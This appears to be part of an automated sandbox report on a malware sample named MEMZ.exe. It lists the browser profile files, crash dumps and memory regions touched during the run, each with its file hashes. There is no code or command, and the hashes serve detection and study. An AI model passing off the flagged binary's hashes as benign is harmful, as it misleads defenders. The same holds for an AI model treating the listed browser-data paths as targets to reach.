C:\Users\Admin\AppData\Local\Microsoft\Edge\Edge Data\Default\data_reduction_proxy_leveldb\CURRENT

MD5 aefd77f47fb84fae5ea194496b44c67a
SHA1 dcfbb6a5b8d05662c4858664f81693bb7f803b82
SHA256 4166bf17b2da789b0d0cc5c74203041d98005f5d4ef88c27e8281e00148cd611
SHA512 b733d502138821948267a8b27401d7c0751e590e1298fda1428e663ccd02f55d0d2446ff4bc265bdcdc61f952d13c01524a5341bc86afc3c2cde1d8589b2e1c3

C:\Users\Admin\AppData\Local\Microsoft\Edge\Edge Data\Crashpad\reports\97b0e469-3058-4f47-9dc0-784d529de9e6.dmp

MD5 bf95dcc49b9ae8ae74a557cb6d8799cd
SHA1 6d2a1cb852938a09c20d24e9e83f44c8c509434e
SHA256 d7655226f499a1e3136776402c1aa35d93ee3f5596af2caaebd29fdc027cb12d
SHA512 ccd0ab211b761e7a76a22075133d9f0f5aab71759a0d4108d73eb487dbb80eebb29a06f0f235037b3593bbb48d56ccc24342f69bcb144ce4eec342b233d91b83

C:\Users\Admin\AppData\Local\Microsoft\Edge\Edge Data\Crashpad\settings.dat

MD5 c07e811593efddcde550fe5946bf38ea
SHA1 f297db7a74d20c6f05d69f0a49857d83aaed5a20
SHA256 db054a0a813ba16ab331e413840cf841895788a73185997df78cb1480eec5b7b
SHA512 0ad7a4db7d7ad7a02c691f4e2d4fb2cb18ed9fddf179d1e80082f723f1d753d4855a23a8fc931c2a9909391f3fc02b1b0fe7d4f3af6580fd71608884a3dbb5a7

C:\Users\Admin\AppData\Local\Microsoft\Edge\Edge Data\Crashpad\reports\3116812f-f444-4cf0-8685-ccf48a6dc746.dmp

MD5 2318cabe95b2303931be2d65ed132d8f
SHA1 5e6d7749f72b652dab761c4a400c7d9d9b6e304b
SHA256 90c3a7ca6bbfcc7a3584822a233ebe22a563ababa172f9d2dca990f5c451fd6d
SHA512 991c6e2ea7361f54b6fa28b2d703f2005e111c43c0963dd754a1171b275850009cfaa540d706629d5f1edeae31f42911b27fa6319bb19ce2c469a12b3ecdf7a8

C:\Users\Admin\AppData\Local\Microsoft\Edge\Edge Data\Crashpad\reports\bb835419-73fc-41b5-90b3-671b63143c7b.dmp

MD5 c469583fd0380022cac6b4f831fad4c6
SHA1 0e385e72b348e54874cfd948102bf3bd6b560811
SHA256 9c77f8c592fb507706377bba5c5eeef9b3c813087875c31d9166edc4cceb33fb
SHA512 fbb2f4171e2338ac64dabcfb1c69c269a26a3cc7c41c5220ab1c5598fb665f599e7f88efd845ce4efbb19924b95c1be0660d31f3fc782dd2b923df99a3e88527

C:\Users\Admin\AppData\Local\Microsoft\Edge\Edge Data\Crashpad\settings.dat

MD5 dbc3c4b4218b19771990308eb07b8c3d
SHA1 6515e1d0e9fe372d554c1f117156844d1292517d
SHA256 3cd152badfba6703bdbd19f7b8763a6909b84240ff3f088942b5be987e64cc91
SHA512 ec263ba2f9fccd2b6fa35b8914fcbad514f6e8509d3735e1a3a101d131b0a25a2584ad0de45206bf2ffb014d6a93f12fb919492f8b3d45e3f082a95bc1eaa94f

C:\Users\Admin\AppData\Local\Microsoft\Edge\Edge Data\Crashpad\reports\a5e77445-2e21-4ec4-83dc-0986e3886b57.dmp

MD5 31b92b0fa4cb2262bc66e4961193bd23
SHA1 30912adf6843c6601225e7c64266268acae8bbaf
SHA256 2a0a9b2cb12dbcd62c8e2c725c00ced211bfa6a062ff4b301ffb81e189c5323f
SHA512 5214c474adaa521fb91616042461d7a13f200ae76985c1e4d63b832c965f43e8ef1511b5bbd38936235496482e4403229c1103f9c33e68e2cb1b0ef0838ceeee

C:\Users\Admin\AppData\Local\Microsoft\Edge\Edge Data\Crashpad\reports\42ebce80-a508-4456-8ce3-a923ef1fb162.dmp

MD5 5e0c9ece64759093217d1303723194f1
SHA1 b578da598de7189d1f632be69fa10ac2498ee26a
SHA256 00d53f2a60f1d454b0dc58271847e2071d339bd9dc31fe883bcba09eec4f4b77
SHA512 1a9ad488f32bc601397f34d12aa3957e555c32fc5df48951ec099b0938588172a9f95861457c0306a964c02f55fe2736deb3cb11a65cc1959c44a4e8c2fb5878

C:\Users\Admin\AppData\Local\Microsoft\Edge\Edge Data\Crashpad\reports\3ab6b560-b61d-4967-83c4-cefac8366151.dmp

MD5 3c3a192e298a94e3b56a5ca977fef26b
SHA1 37d0d1fc98afaec119bc25aa51916677db9da358
SHA256 405d42a03c9738aa5c839e9ab865e538e79e345e26ba2b27257fcb89f8c8c6d1
SHA512 7386fedda75ef22871d57d68702b111d0876074c7bc0bbf91e2ef5dd84aff2ba23ea23000f2b81e96d547988db55286cf1f392841418063f2c80aceabb86159a

C:\Users\Admin\AppData\Local\Microsoft\Edge\Edge Data\Crashpad\reports\58580769-cc6b-402b-b5f3-a2e717c3b25e.dmp

MD5 7384cfb21540d15c46135952d6e60c5a
SHA1 abd0119b8b466ade2538321d5f52c2e8c2d5c473
SHA256 2563a804dc0e898d2095983f6fb5d57cf59b4cd0546d66cbad31a42c8a3bab18
SHA512 3f61e5cad41b43f3835e52b76c5c389350f34a03dbc2a626f640bba69e1f219eb7bfb0117deb446648fbda34d15969e74cd4ecedb96c3d0bf1336f31cd6e452d

C:\Users\Admin\AppData\Local\Google\Chrome\Chrome Data\Local State

MD5 4b836ed0d9f9e1d5382576cf3e917ed3
SHA1 22e1359a5bc07cc28ab0e795927eb0caf0849d66
SHA256 4e6c0bac073ed7099be18d17608d2ab298751861d03f6a1bb46be080227334a1
SHA512 720a3e48b526b4be8f77bc0057b42c8199ffa254c3a231a1691f1dc258465c206919bd61ab2ca5c9dd5b397bbe4e7d723482679a07018e38b163326be6a7fae4

C:\Users\Admin\AppData\Local\Google\Chrome\Chrome Data\Default\Preferences

MD5 a0d0b7d291df39fbb6fdc832f21e6d9e
SHA1 a6f3c66871dd56a87f79f15374016f0def94bd63
SHA256 7d52e98a601cbce202aa4ed507459a7f84b48d02a35dbf18a4ce64bc3e7eac50
SHA512 f3d754253fc8e61c90e9e176f5a6e5a712bcef762409752307c1135e50457df0eb1257eedf55964475e7caf0a1a247882adc498d6fba94069262a4de1ddc1882

C:\Users\Admin\AppData\Local\Google\Chrome\Chrome Data\Local State

MD5 42800da6dcd5a66f4717e52514d8f6c0
SHA1 3613766946abb6b35ba7b06144ecdfca80dd3c7c
SHA256 4240a14fca69dca1ac454db579502dceff029d3e1a1984e18b7d40c78fe84d99
SHA512 2e8287daf5d95ccfb09baca00daad28a470c1718d220ed0fb01eb818472d8ba6b03ce8968be3bff1544b3be49031a3c15e75426099383cebb7130f72725a5122

C:\Users\Admin\AppData\Local\Google\Chrome\Chrome Data\Default\Network\TransportSecurity

MD5 a1c645f801df57b3c6909cedebe3e971
SHA1 032d986076ba672cce2506aed94e9a0a5448b759
SHA256 a96293d9ca900393a2a486a2b73b4ff4ce9c290407fe0acf621775cd3eabf008
SHA512 cd1351a325d4dfe69cf3e3a5698ca444f2d7d9e1356ca744977067f909e5af41dbae361c88766d6cb127690274058a85422c42857942eee00ec445fa718483c0

C:\Users\Admin\AppData\Local\Google\Chrome\Chrome Data\Default\IndexedDB\https_www.youtube.com_0.indexeddb.leveldb\MANIFEST-000001

MD5 3fd11ff447c1ee23538dc4d9724427a3
SHA1 1335e6f71cc4e3cf7025233523b4760f8893e9c9
SHA256 720a78803b84cbcc8eb204d5cf8ea6ee2f693be0ab2124ddf2b81455de02a3ed
SHA512 10a3bd3813014eb6f8c2993182e1fa382d745372f8921519e1d25f70d76f08640e84cb8d0b554ccd329a6b4e6de6872328650fefa91f98c3c0cfc204899ee824

C:\Users\Admin\AppData\Local\Google\Chrome\Chrome Data\Default\Service Worker\CacheStorage\379f1cbab5b08b6fc9e08681e42d8be311441c88\index.txt

MD5 b6f48def1ad0dc727f479ce8ffec8a6b
SHA1 488a3d7c23f20d7c90d9cd3010d31836d67b4028
SHA256 88b9c140ca5cdbc682401e0cd009ef606ef17510c596d69c12b629f720543aec
SHA512 ff657c31fa12c36894ac6002bbc33c3263739b9727aa255687ff9299087d47b2a6b390cd0bb6ce588b992c245e497f5e9178de97bec3c72a2d696160dd9f3a9a

C:\Users\Admin\AppData\Local\Google\Chrome\Chrome Data\Default\Service Worker\CacheStorage\379f1cbab5b08b6fc9e08681e42d8be311441c88\index.txt~RFe601428.TMP

MD5 f68a05222f1f297be3e7a9606c735731
SHA1 1c2940ecf84f2d17a1c80d1d1f66375e4ee389b0
SHA256 efcf11aeafdcf3c474a6b161dc6a3a88b2cb45abf5d7caec969d38ebbc18a51e
SHA512 e9f70617ab9731426ed2f69280dacfac2d565c72db444068282eef63723a2d17f17d8ab2a661cad118adc404775480c252567be5c4b6b57b94a33578b4267206

C:\Users\Admin\AppData\Local\Google\Chrome\Chrome Data\Default\Network\TransportSecurity

MD5 653c82985b94b8e2dfc800c1b15945ff
SHA1 71ad42aa17c076285eda40f2f0869c65213eb4ea
SHA256 bb8c442d18e99672111e2cc6e8c53b69c979da7425169a44625129c78a8ce9c6
SHA512 6b8107dd29d0b9f7a861b62ba1563efae25498775d793f6de0ec259df7f50bc9310f926e4beddccbbd7464097d9624164ee52bc979f11e1252afd1d7de3e1c01

C:\Users\Admin\AppData\Local\Google\Chrome\Chrome Data\Default\Preferences

MD5 d8722c16c7f480691412c603a66b1d1e
SHA1 2c5fb18a04241d45f423741b218450ac01a77bc9
SHA256 98d158eeadf05599860e028d69b5da53b605137bba6f537d9b0f30094e694eac
SHA512 b8f3b3c324ff1b1a1e9d3b3013af4d8e49d3a06662cc2e574264455c8be9fd9a9b37bd837cc9196ad81c599ff09058fa0436db3d65d379cac04b388d98730ef5

C:\Users\Admin\Downloads\MEMZ.exe

MD5 1d5ad9c8d3fee874d0feb8bfac220a11
SHA1 ca6d3f7e6c784155f664a9179ca64e4034df9595
SHA256 3872c12d31fc9825e8661ac01ecee2572460677afbc7093f920a8436a42e28ff
SHA512 c8246f4137416be33b6d1ac89f2428b7c44d9376ac8489a9fbf65ef128a6c53fb50479e1e400c8e201c8611992ab1d6c1bd3d6cece89013edb4d35cdd22305b1

C:\Users\Admin\AppData\Local\Google\Chrome\Chrome Data\Default\Network\TransportSecurity

MD5 ab2ec200e5a389f946abcbea411f9be5
SHA1 1ea157150879808b5a33ebf47690651eeb2cadfc
SHA256 01309a708f1ffbb0b9bf3e9a892ac3cc1855b199f3cc8649ec3ad873e7fad442
SHA512 47f1ee6cc17d183d65744c6240e1da74f47b04d58c4d451ce78119851e8370d32c242d8b04955eb1f186f534a747a0331f68390ee836a14539d56b37129fff04

C:\Users\Admin\AppData\Local\Google\Chrome\Chrome Data\Default\Preferences

MD5 e7ec54184b9a7dec06ee4e2bb0d961e2
SHA1 9bb0c880b021809c19158e0e0132e7b42c047a0f
SHA256 bd3b0541ae8c809436316512f4f59dcb77c36102b4babf5829b3c11aceecedc7
SHA512 095bf3e3fff00053106957909ff246cac569c8f23bbddd273c2dbc3a89d4a69b72913d2fc0c7408365e06792c3e58d4ec6161b264f8c268f3044431161aece8c

C:\Users\Admin\AppData\Local\Google\Chrome\Chrome Data\Module Info Cache

MD5 1325ba0f870865b6d5b0fe5281ffe774
SHA1 888e2048d4bf10e068607f0cb4c3ee2f5ee95a1b
SHA256 dfc8c514b049827b87a216617caacff4880e083546cacdc7b159575176b94276
SHA512 c1728d59786c0ad94914d1d91c52d32ab46e56632c80aa51924c443c8bdbcdcc9d550901e8854b8ec33ef6a121327b8bfed1cceccbd7813389795d74eaed62fe

C:\Users\Admin\AppData\Local\Google\Chrome\Chrome Data\Default\Code Cache\js\index-dir\the-real-index

MD5 d77e85f3fea163c5574be64b37bbf18b
SHA1 90b958053fd77be1d36185c50f76737f2710d94b
SHA256 958fb8d6a829f4f556643e89093ef82994701105c84dc88c00131157f3fc2b54
SHA512 b09790c32eb6bdab65bb03c98b042187aa71eda564807bf3b74b8e66a8b3a2a0355dafb9fcdd7d0f223bf90b8fe5714e889965a2ba4eb6b0c4c5bee04ff273e0

C:\Users\Admin\AppData\Local\Google\Chrome\Chrome Data\Default\Network\Network Persistent State

MD5 226921fea01e0a65ead2016c31fbfe7d
SHA1 791bafa39cfd27c26fbf89e7ddffd135bc7e82f6
SHA256 a435d231db6c9bdd44ad7d5fd4f94c6a945518e91d55a0668f96f9377a09f3c0
SHA512 4eb370d7d8154509cbf2d290a790a410b02830ce90727f696f96d34f4a208bd9014d2ec2ad508f840cad7211ac6c7aa701f76484428f82a2a9a110def97313fb

memory/1424-3716-0x000000001BA70000-0x000000001BB20000-memory.dmp

memory/1424-3717-0x0000000020C50000-0x0000000021178000-memory.dmp

memory/1424-3772-0x000000001B9B0000-0x000000001B9BA000-memory.dmp

C:\Config.Msi\e6223e0.rbs

MD5 835c73d665a042e10564dd7a6cea13f5
SHA1 53a072edb02d8b54065cec817b4f366c4320e8b3
SHA256 3afce4156321d80e36eb46ed28ecf60fb45aab365c8ff58593ba860d81f314fc
SHA512 b9b4a9521b5c440a4dcf20cc0046244cdf6afb73e658da9b4259905f1b8c45b40af50494e8a3c053d29113b6939e7fc551a018a806096faec7d0de3c0a6e29b8